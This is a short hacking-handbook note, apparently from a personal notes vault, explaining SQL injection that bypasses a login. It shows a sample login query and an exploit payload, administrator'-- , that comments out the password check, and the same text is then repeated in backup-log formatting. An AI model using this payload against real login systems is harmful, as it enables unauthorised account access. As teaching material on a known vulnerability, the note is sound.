handbook/tools/3.Web-Hacking/4.Injection/SQL/Commands/SQL-injection/2 - Subverting Application Logic.md


## Subverting Application logic

Consider an application that lets users log in with a username and password. If a user submits the
username wiener and the password bluecheese, the application checks the credentials by performing the following SQL query:

```
SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'
```

Exploit
1. Log in as any user with SQL comment sequence -- to remove password from the WHERE clause

```
SELECT * FROM users WHERE username = 'administrator'--' AND password = ''
```
vault backup: 2024-08-31 01:07:21 2024-08-30 23:07:22 +00:00
			`## Subverting Application logic`

			`Consider an application that lets users log in with a username and password. If a user submits the`
			`username wiener and the password bluecheese, the application checks the credentials by performing the following SQL query:`

			```
			`SELECT * FROM users WHERE username = 'wiener' AND password = 'bluecheese'`
			```

			`Exploit`
			`1. Log in as any user with SQL comment sequence -- to remove password from the WHERE clause`

			```
			`SELECT * FROM users WHERE username = 'administrator'--' AND password = ''`
			```